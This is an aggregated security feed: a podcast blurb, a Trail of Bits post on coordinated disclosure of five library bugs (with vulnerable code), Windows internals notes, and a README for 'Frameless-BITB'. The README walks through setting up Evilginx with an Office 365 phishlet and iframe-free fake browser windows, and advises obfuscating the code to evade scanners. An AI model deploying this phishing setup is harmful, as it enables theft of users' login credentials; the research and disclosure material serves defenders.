❌

Normal view

There are new articles available, click to refresh the page.
Yesterday β€” 15 April 2024Main stream

Working as a CIO and the challenges of endpoint security| Guest Tom Molden

By: Infosec
15 April 2024 at 18:00

Today on Cyber Work, our deep-dive into manufacturing and operational technology (OT) cybersecurity brings us to the problem of endpoint security. Tom Molden, CIO of Global Executive Engagement at Tanium, has been grappling with these problems for a while. We talk about his early, formative tech experiences (pre-Windows operation system!), his transformational position moving from fiscal strategy and implementation into his first time as chief information officer and talk through the interlocking problems that come from connected manufacturing devices and the specific benefits and challenges to be found in strategizing around the endpoints. All of the endpoints.

0:00 - Manufacturing and endpoint security
1:44 - Tom Molden's early interest in computers
4:06 - Early data usage
6:26 - Becoming a CIO
10:29 - Difference between a CIO and CISO
14:57 - Problems for manufacturing companies
18:45 - Best CIO problems to solve in manufacturing
22:51 - Security challenges of manufacturing
26:00 - The scop of endpoint issues
33:27 - Endpoints in manufacturing security
37:12 - How to work in manufacturing security
39:29 - Manufacturing security skills gaps
41:54 - Gain manufacturing security work experience
43:41 - Tom Molden's best career advice received
46:26 - What is Tanium
47:58 - Learn more about Tom Molden
48:34 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

πŸ’Ύ

5 reasons to strive for better disclosure processes

15 April 2024 at 13:00

By Max Ammann

This blog showcases five examples of real-world vulnerabilities that we’ve disclosed in the past year (but have not publicly disclosed before). We also share the frustrations we faced in disclosing them to illustrate the need for effective disclosure processes.

Here are the five bugs:

Discovering a vulnerability in an open-source project necessitates a careful approach, as publicly reporting it (also known as full disclosure) can alert attackers before a fix is ready. Coordinated vulnerability disclosure (CVD) uses a safer, structured reporting framework to minimize risks. Our five example cases demonstrate how the lack of a CVD process unnecessarily complicated reporting these bugs and ensuring their remediation in a timely manner.

In the Takeaways section, we show you how to set up your project for success by providing a basic security policy you can use and walking you through a streamlined disclosure process called GitHub private reporting. GitHub’s feature has several benefits:

  • Discreet and secure alerts to developers: no need for PGP-encrypted emails
  • Streamlined process: no playing hide-and-seek with company email addresses
  • Simple CVE issuance: no need to file a CVE form at MITRE

Time for action: If you own well-known projects on GitHub, use private reporting today! Read more on Configuring private vulnerability reporting for a repository, or skip to the Takeaways section of this post.

Case 1: Undefined behavior in borsh-rs Rust library

The first case, and reason for implementing a thorough security policy, concerned a bug in a cryptographic serialization library called borsh-rs that was not fixed for two years.

During an audit, I discovered unsafe Rust code that could cause undefined behavior if used with zero-sized types that don’t implement the Copy trait. Even though somebody else reported this bug previously, it was left unfixed because it was unclear to the developers how to avoid the undefined behavior in the code and keep the same properties (e.g., resistance against a DoS attack). During that time, the library’s users were not informed about the bug.

The whole process could have been streamlined using GitHub’s private reporting feature. If project developers cannot address a vulnerability when it is reported privately, they can still notify Dependabot users about it with a single click. Releasing an actual fix is optional when reporting vulnerabilities privately on GitHub.

I reached out to the borsh-rs developers about notifying users while there was no fix available. The developers decided that it was best to notify users because only certain uses of the library caused undefined behavior. We filed the notification RUSTSEC-2023-0033, which created a GitHub advisory. A few months later, the developers fixed the bug, and the major release 1.0.0 was published. I then updated the RustSec advisory to reflect that it was fixed.

The following code contained the bug that caused undefined behavior:

impl<T> BorshDeserialize for Vec<T>
where
    T: BorshDeserialize,
{
    #[inline]
    fn deserialize<R: Read>(reader: &mut R) -> Result<Self, Error> {
        let len = u32::deserialize(reader)?;
        if size_of::<T>() == 0 {
            let mut result = Vec::new();
            result.push(T::deserialize(reader)?);

            let p = result.as_mut_ptr();
            unsafe {
                forget(result);
                let len = len as usize;
                let result = Vec::from_raw_parts(p, len, len);
                Ok(result)
            }
        } else {
            // TODO(16): return capacity allocation when we can safely do that.
            let mut result = Vec::with_capacity(hint::cautious::<T>(len));
            for _ in 0..len {
                result.push(T::deserialize(reader)?);
            }
            Ok(result)
        }
    }
}

Figure 1: Use of unsafe Rust (borsh-rs/borsh-rs/borsh/src/de/mod.rs#123–150)

The code in figure 1 deserializes bytes to a vector of some generic data type T. If the type T is a zero-sized type, then unsafe Rust code is executed. The code first reads the requested length for the vector as u32. After that, the code allocates an empty Vec type. Then it pushes a single instance of T into it. Later, it temporarily leaks the memory of the just-allocated Vec by calling the forget function and reconstructs it by setting the length and capacity of Vec to the requested length. As a result, the unsafe Rust code assumes that T is copyable.

The unsafe Rust code protects against a DoS attack where the deserialized in-memory representation is significantly larger than the serialized on-disk representation. The attack works by setting the vector length to a large number and using zero-sized types. An instance of this bug is described in our blog post Billion times emptiness.

Case 2: DoS vector in Rust libraries for parsing the Ethereum ABI

In July, I disclosed multiple DoS vulnerabilities in four Ethereum API–parsing libraries, which were difficult to report because I had to reach out to multiple parties.

The bug affected four GitHub-hosted projects. Only the Python project eth_abi had GitHub private reporting enabled. For the other three projects (ethabi, alloy-rs, and ethereumjs-abi), I had to research who was maintaining them, which can be error-prone. For instance, I had to resort to the trick of getting email addresses from maintainers by appending the suffix .patch to GitHub commit URLs. The following link shows the non-work email address I used for committing:

https://github.com/trailofbits/publications/commit/a2ab5a1cab59b52c4fa
71b40dae1f597bc063bdf.patch

In summary, as the group of affected vendors grows, the burden on the reporter grows as well. Because you typically need to synchronize between vendors, the effort does not grow linearly but exponentially. Having more projects use the GitHub private reporting feature, a security policy with contact information, or simply an email in the README file would streamline communication and reduce effort.

Read more about the technical details of this bug in the blog post Billion times emptiness.

Case 3: Missing limit on authentication tag length in Expo

In late 2022, Joop van de Pol, a security engineer at Trail of Bits, discovered a cryptographic vulnerability in expo-secure-store. In this case, the vendor, Expo, failed to follow up with us about whether they acknowledged or had fixed the bug, which left us in the dark. Even worse, trying to follow up with the vendor consumed a lot of time that could have been spent finding more bugs in open-source software.

When we initially emailed Expo about the vulnerability through the email address listed on its GitHub, [email protected], an Expo employee responded within one day and confirmed that they would forward the report to their technical team. However, after that response, we never heard back from Expo despite two gentle reminders over the course of a year.

Unfortunately, Expo did not allow private reporting through GitHub, so the email was the only contact address we had.

Now to the specifics of the bug: on Android above API level 23, SecureStore uses AES-GCM keys from the KeyStore to encrypt stored values. During encryption, the tag length and initialization vector (IV) are generated by the underlying Java crypto library as part of the Cipher class and are stored with the ciphertext:

/* package */ JSONObject createEncryptedItem(Promise promise, String plaintextValue, Cipher cipher, GCMParameterSpec gcmSpec, PostEncryptionCallback postEncryptionCallback) throws GeneralSecurityException, JSONException {

  byte[] plaintextBytes = plaintextValue.getBytes(StandardCharsets.UTF_8);
  byte[] ciphertextBytes = cipher.doFinal(plaintextBytes);
  String ciphertext = Base64.encodeToString(ciphertextBytes, Base64.NO_WRAP);

  String ivString = Base64.encodeToString(gcmSpec.getIV(), Base64.NO_WRAP);
  int authenticationTagLength = gcmSpec.getTLen();

  JSONObject result = new JSONObject()
    .put(CIPHERTEXT_PROPERTY, ciphertext)
    .put(IV_PROPERTY, ivString)
    .put(GCM_AUTHENTICATION_TAG_LENGTH_PROPERTY, authenticationTagLength);

  postEncryptionCallback.run(promise, result);

  return result;
}

Figure 2: Code for encrypting an item in the store, where the tag length is stored next to the cipher text (SecureStoreModule.java)

For decryption, the ciphertext, tag length, and IV are read and then decrypted using the AES-GCM key from the KeyStore.

An attacker with access to the storage can change an existing AES-GCM ciphertext to have a shorter authentication tag. Depending on the underlying Java cryptographic service provider implementation, the minimum tag length is 32 bits in the best case (this is the minimum allowed by the NIST specification), but it could be even lower (e.g., 8 bits or even 1 bit) in the worst case. So in the best case, the attacker has a small but non-negligible probability that the same tag will be accepted for a modified ciphertext, but in the worst case, this probability can be substantial. In either case, the success probability grows depending on the number of ciphertext blocks. Also, both repeated decryption failures and successes will eventually disclose the authentication key. For details on how this attack may be performed, see Authentication weaknesses in GCM from NIST.

From a cryptographic point of view, this is an issue. However, due to the required storage access, it may be difficult to exploit this issue in practice. Based on our findings, we recommended fixing the tag length to 128 bits instead of writing it to storage and reading it from there.

The story would have ended here since we didn’t receive any responses from Expo after the initial exchange. But in our second email reminder, we mentioned that we were going to publicly disclose this issue. One week later, the bug was silently fixed by limiting the minimum tag length to 96 bits. Practically, 96 bits offers sufficient security. However, there is also no reason not to go with the higher 128 bits.

The fix was created exactly one week after our last reminder. We suspect that our previous email reminder led to the fix, but we don’t know for sure. Unfortunately, we were never credited appropriately.

Case 4: DoS vector in the num-bigint Rust library

In July 2023, Sam Moelius, a security engineer at Trail of Bits, encountered a DoS vector in the well-known num-bigint Rust library. Even though the disclosure through email worked very well, users were never informed about this bug through, for example, a GitHub advisory or CVE.

The num-bigint project is hosted on GitHub, but GitHub private reporting is not set up, so there was no quick way for the library author or us to create an advisory. Sam reported this bug to the developer of num-bigint by sending an email. But finding the developer’s email is error-prone and takes time. Instead of sending the bug report directly, you must first confirm that you’ve reached the correct person via email and only then send out the bug details. With GitHub private reporting or a security policy in the repository, the channel to send vulnerabilities through would be clear.

But now let’s discuss the vulnerability itself. The library implements very large integers that no longer fit into primitive data types like i128. On top of that, the library can also serialize and deserialize those data types. The vulnerability Sam discovered was hidden in that serialization feature. Specifically, the library can crash due to large memory consumption or if the requested memory allocation is too large and fails.

The num-bigint types implement traits from Serde. This means that any type in the crate can be serialized and deserialized using an arbitrary file format like JSON or the binary format used by the bincode crate. The following example program shows how to use this deserialization feature:

use num_bigint::BigUint;
use std::io::Read;

fn main() -> std::io::Result<()> {
    let mut buf = Vec::new();
    let _ = std::io::stdin().read_to_end(&mut buf)?;
    let _: BigUint = bincode::deserialize(&buf).unwrap_or_default();
    Ok(())
}

Figure 3: Example deserialization format

It turns out that certain inputs cause the above program to crash. This is because implementing the Visitor trait uses untrusted user input to allocate a specific vector capacity. The following figure shows the lines that can cause the program to crash with the message memory allocation of 2893606913523067072 bytes failed.

impl<'de> Visitor<'de> for U32Visitor {
    type Value = BigUint;

    {...omitted for brevity...}

    #[cfg(not(u64_digit))]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        let len = seq.size_hint().unwrap_or(0);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }

    #[cfg(u64_digit)]
    fn visit_seq<S>(self, mut seq: S) -> Result<Self::Value, S::Error>
    where
        S: SeqAccess<'de>,
    {
        use crate::big_digit::BigDigit;
        use num_integer::Integer;

        let u32_len = seq.size_hint().unwrap_or(0);
        let len = Integer::div_ceil(&u32_len, &2);
        let mut data = Vec::with_capacity(len);

        {...omitted for brevity...}
    }
}

Figure 4: Code that allocates memory based on user input (num-bigint/src/biguint/serde.rs#61–108)

We initially contacted the author on July 20, 2023, and the bug was fixed in commit 44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4.

Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv

The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark.

During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement:

MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path,
                               std::string cryptKey) {
  __android_log_print(ANDROID_LOG_INFO, "RNMMKV",
                      "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)",
                      instanceId.c_str(), path.c_str(), cryptKey.c_str());
  std::string* pathPtr = path.size() > 0 ? &path : nullptr;
  {...omitted for brevity...}

Figure 5: Code that initializes MMKV and also logs the encryption key

Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled.

With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install.

This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process.

Takeaways

GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory databaseβ€”a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers).

The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls.

However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness.

Step 1: Add a security policy

Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability.

GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root.

We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following:

We have multiple channels for receiving reports:

* If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to [email protected]

Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly.

Step 2: Enable private reporting

Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies.

Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require.

After configuring the notifications, go to the β€œSecurity” tab of your repository and click β€œEnable vulnerability reporting”:

Emails about reported vulnerabilities have the subject line β€œ(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this:

If you want to enable private reporting for your whole organization, then check out this documentation.

A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically.

On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub.

This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design.

Step 3: Get notifications via webhooks

If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type:

After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability.

How to make security researchers happy

If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day.

If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting.

If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.

Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

By: Zion3R
15 April 2024 at 12:30


A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

β˜•οΈŽ Buy Me A Coffee

Video Tutorial: πŸ‘‡

Disclaimer

This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

Backstory - The Why

Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

The What

A Browser In The Browser (BITB) without any iframes! As simple as that.

Meaning that we can now use BITB with Evilginx on websites like Microsoft.

Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

The How

Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.

Instructions

Video Tutorial


Local VM:

Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

Update and Upgrade system packages:

sudo apt update && sudo apt upgrade -y

Evilginx Setup:

Optional:

Create a new evilginx user, and add user to sudo group:

sudo su

adduser evilginx

usermod -aG sudo evilginx

Test that evilginx user is in sudo group:

su - evilginx

sudo ls -la /root

Navigate to users home dir:

cd /home/evilginx

(You can do everything as sudo user as well since we're running everything locally)

Setting Up Evilginx

Download and build Evilginx: Official Docs

Copy Evilginx files to /home/evilginx

Install Go: Official Docs

wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
nano ~/.profile

ADD: export PATH=$PATH:/usr/local/go/bin

source ~/.profile

Check:

go version

Install make:

sudo apt install make

Build Evilginx:

cd /home/evilginx/evilginx2
make

Create a new directory for our evilginx build along with phishlets and redirectors:

mkdir /home/evilginx/evilginx

Copy build, phishlets, and redirectors:

cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

Ubuntu firewall quick fix (thanks to @kgretzky)

sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener to no > DNSStubListener=no

then

sudo systemctl restart systemd-resolved

Modify Evilginx Configurations:

Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

nano ~/.evilginx/config.json

CHANGE https_port from 443 to 8443

Install Apache2 and Enable Mods:

Install Apache2:

sudo apt install apache2 -y

Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_balancer
sudo a2enmod lbmethod_byrequests
sudo a2enmod env
sudo a2enmod include
sudo a2enmod setenvif
sudo a2enmod ssl
sudo a2ensite default-ssl
sudo a2enmod cache
sudo a2enmod substitute
sudo a2enmod headers
sudo a2enmod rewrite
sudo a2dismod access_compat

Start and enable Apache:

sudo systemctl start apache2
sudo systemctl enable apache2

Try if Apache and VM networking works by visiting the VM's IP from a browser on the host machine.

Clone this Repo:

Install git if not already available:

sudo apt -y install git

Clone this repo:

git clone https://github.com/waelmas/frameless-bitb
cd frameless-bitb

Apache Custom Pages:

Make directories for the pages we will be serving:

  • home: (Optional) Homepage (at base domain)
  • primary: Landing page (background)
  • secondary: BITB Window (foreground)
sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

Copy the directories for each page:


sudo cp -r ./pages/home/ /var/www/

sudo cp -r ./pages/primary/ /var/www/

sudo cp -r ./pages/secondary/ /var/www/

Optional: Remove the default Apache page (not used):

sudo rm -r /var/www/html/

Copy the O365 phishlet to phishlets directory:

sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

Self-signed SSL certificates:

Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

Create dir and parents if they do not exist:

sudo mkdir -p /etc/ssl/localcerts/fake.com/

Generate the SSL certs using the OpenSSL config file:

sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
-keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
-config openssl-local.cnf

Modify private key permissions:

sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

Apache Custom Configs:

Copy custom substitution files (the core of our approach):

sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of two or implement your own logic for automatic switching.

Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

# Uncomment the one you want and remember to restart Apache after any changes:
#Include /etc/apache2/custom-subs/win-chrome.conf
Include /etc/apache2/custom-subs/mac-chrome.conf

Simply to make it easier, I included both versions as separate files for this next step.

Windows/Chrome BITB:

sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Mac/Chrome BITB:

sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

Test Apache configs to ensure there are no errors:

sudo apache2ctl configtest

Restart Apache to apply changes:

sudo systemctl restart apache2

Modifying Hosts:

Get the IP of the VM using ifconfig and note it somewhere for the next step.

We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

On Windows:

Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

C:\Windows\System32\drivers\etc\

Change the file types (bottom-right) to "All files".

Double-click the file named hosts

On Mac:

Open a terminal and run the following:

sudo nano /private/etc/hosts

Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

# Local Apache and Evilginx Setup
[IP] login.fake.com
[IP] account.fake.com
[IP] sso.fake.com
[IP] www.fake.com
[IP] portal.fake.com
[IP] fake.com
# End of section

Save and exit.

Now restart your browser before moving to the next step.

Note: On Mac, use the following command to flush the DNS cache:

sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlet get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

Trusting the Self-Signed SSL Certs:

Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

For this step, it's easier to follow the video instructions, but here is the gist anyway.

Open https://fake.com/ in your Chrome browser.

Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > install for current user. Do NOT select automatic, instead place the certificate in specific store: select "Trusted Route Certification Authorities".

On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

Now RESTART your Browser

You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

Running Evilginx:

At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

sudo apt install tmux -y

Start Evilginx in developer mode (using tmux to avoid losing the session):

tmux new-session -s evilginx
cd ~/evilginx/
./evilginx -developer

(To re-attach to the tmux session use tmux attach-session -t evilginx)

Evilginx Config:

config domain fake.com
config ipv4 127.0.0.1

IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

blacklist noadd

Setup Phishlet and Lure:

phishlets hostname O365 fake.com
phishlets enable O365
lures create O365
lures get-url 0

Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

Useful Resources

Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

TODO

  • Create script(s) to automate most of the steps


Windows Internals Notes

27 January 2024 at 02:40

I spent some time over the Christmas break least year learning the basics of Windows Internals and thought it was a good opportunity to use my naive reverse engineering skills to find answers to my own questions. This is not a blog but rather my own notes on Windows Internals. I’ll keep updating them and adding new notes as I learn more.

Windows Native API

As mentioned on Wikipedia, several native Windows API calls are implemented in ntoskernel.exe and can be accessed from user mode through ntdll.dll. TheΒ entry pointΒ of NTDLL isΒ LdrInitializeThunk and native API calls are handled by the Kernel via theΒ System Service Descriptor TableΒ (SSDT).

The native API is used early in the Windows startup process when other components or APIs are not available yet. Therefore, a few Windows components, such as theΒ Client/Server Runtime SubsystemΒ (CSRSS), are implemented using the Native API.Β  The native API is also used by subroutines from Kernel32.DLL and others to implement Windows API on which most of the Windows components are created.

The native API contains several functions, including C Runtime Function that are needed for a very basic C Runtime execution, such as strlen(); however, it lacks some other common functions or procedures such as malloc(), printf(), and scanf(). The reason for that is that malloc() does not specify which heap to use for memory allocation, and printf() and scans() use a console which can be accessed only through Kernel32.

Native API Naming Convention

Most of the native APIs have a prefix such as Nt, Zw, and Rtl etc. All the native APIs that start with Nt or Zw are system calls which are declared in ntoskernl.exe and ntdll.dll and they are identical when called from NTDLL.

  • NtΒ orΒ Zw:Β When called from user mode (NTDLL), they execute anΒ interruptΒ intoΒ kernel modeΒ and call the equivalent function in ntoskrnl.exe via theΒ SSDT. The only difference is that the Zw APIs ensure kernel mode when called from ntoskernl.exe, while the Nt APIs don’t.[1]Β 
  • Rtl:Β This is the second largest group of NTDLL calls. It contains the (extended) C Run-Time Library, which includes many utility functions that can be used by native applications but don’t have a direct kernel support.
  • Csr:Β These are client-server functions that are used to communicate with the Win32 subsystem process,Β csrss.exe.
  • Dbg:Β These areΒ debuggingΒ functions such as a softwareΒ breakpoint.
  • Ki: TheseΒ are upcalls from kernel mode for events likeΒ APCΒ dispatching.
  • Ldr: TheseΒ are loader functions for Portable Executable (PE)Β file which are responsible for handling and starting of new processes.
  • Tp: These areΒ for ThreadPool handling.

Figuring Out Undocumented APIs

Some of these APIs that are part of Windows Driver Kit (WDK) are documented but Microsoft does not provide documentation for rest of the native APIs. So, how can we find the definition for these APIs? How do we know what arguments we need to provide?

As we discussed earlier, these native APIs are defined in ntdll.dll and ntoskernl.exe. Let’s open it in Ghidra and see if we can find the definition for one of the native APIs, NtQueryInformationProcess().

Let’s load NTDLL in Ghidra, analyse it, and check exported functions under the Symbol tree:

Well, the function signature doesn’t look good. It looks like this API call does not accept any parameters (void) ? Well, that can’t be true, because it needs to take at least a handle to a target process.

Now, let’s load ntoskernl.exe in Ghidra and check it there.

Okay, that’s little bit better. We now at least know that it takes five arguments. But what are those arguments? Can we figure it out? Well, at least for this native API, I found its definition on MSDN here. But what if it wasn’t there? Could we still figure out the number of parameters and their data types required to call this native API?

Let’s see if we can find a header file in the Includes directory in Windows Kits (WinDBG) installation directory.

As you can see, the grep command shows the NtQueryInformationProcess() is found in two files, but the definition is found only in winternl.h.

Alas, we found the function declaration! So, now we know that it takes 3 arguments (IN) and returns values in two of the structure members (OUT), ReturnLength and ProcessInformation.

Similarly, another native API, NtOpenProcess() is not defined in NtOSKernl.exe but its declaration can be found in the Windows driver header file ntddk.h.

